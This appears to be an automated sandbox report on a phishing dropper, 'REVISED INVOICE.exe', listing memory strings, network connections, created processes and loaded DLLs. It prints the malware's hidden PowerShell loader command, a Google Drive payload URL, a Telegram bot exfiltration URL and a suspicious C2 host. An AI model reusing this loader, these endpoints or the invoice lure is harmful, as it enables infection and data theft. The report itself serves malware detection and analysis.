Source: msiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022274000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000221D3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: msiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222A0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022274000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022216000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000221D3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000221C7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.628918047.0000000021E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: REVISED INVOICE.exe, REVISED INVOICE.exe.3.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: msiexec.exe, 00000005.00000002.629157566.00000000221EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002227C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: powershell.exe, 00000003.00000002.480576580.0000000002531000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msiexec.exe, 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: msiexec.exe, 00000005.00000002.629157566.00000000222F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000005.00000002.629157566.00000000222EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000005.00000002.629157566.00000000222EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000005.00000002.629157566.00000000222EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20a
Source: msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: powershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/t
Source: msiexec.exe, 00000005.00000002.625278649.0000000000500000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1UdCocYDXIneNm0wsl0RKLwjEdjKNc8DS
Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000005.00000002.625215938.00000000003DC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1UdCocYDXIneNm0wsl0RKLwjEdjKNc8DS&export=download
Source: msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000005.00000002.629157566.000000002227C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022216000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000221D3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000005.00000002.629157566.00000000221D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.71
Source: msiexec.exe, 00000005.00000002.629157566.000000002227C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022216000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.714
Source: msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/favicon.ico
Source: msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=net
Source: msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
Source: msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=wmf
Source: msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index
Source: msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
Source: msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
Source: msiexec.exe, 00000005.00000002.629514463.00000000232EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.0000000023238000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.0000000023346000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.000000002330E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.0000000023292000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.000000002325A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/indextest

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 49162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49180
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown	Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170

Source: unknown	HTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.22:49162 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49181 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\REVISED INVOICE.exe

Code function: 0_2_004052BD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052BD

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: REVISED INVOICE.exe

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\fona\Kvit\REVISED INVOICE.exe

Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\user\Desktop\REVISED INVOICE.exe

Memory allocated: 770B0000 page execute and read and write

Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\REVISED INVOICE.exe "C:\Users\user\Desktop\REVISED INVOICE.exe"
Source: C:\Users\user\Desktop\REVISED INVOICE.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Funktionserklringen=Get-Content -raw 'C:\Users\user\AppData\Local\fona\Kvit\Hyperclimax.Com';$Longers=$Funktionserklringen.SubString(56921,3);.$Longers($Funktionserklringen)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\REVISED INVOICE.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Funktionserklringen=Get-Content -raw 'C:\Users\user\AppData\Local\fona\Kvit\Hyperclimax.Com';$Longers=$Funktionserklringen.SubString(56921,3);.$Longers($Funktionserklringen)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\REVISED INVOICE.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\Desktop\REVISED INVOICE.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\Desktop\REVISED INVOICE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\REVISED INVOICE.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn2.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: nlaapi.dll	Jump to behavior
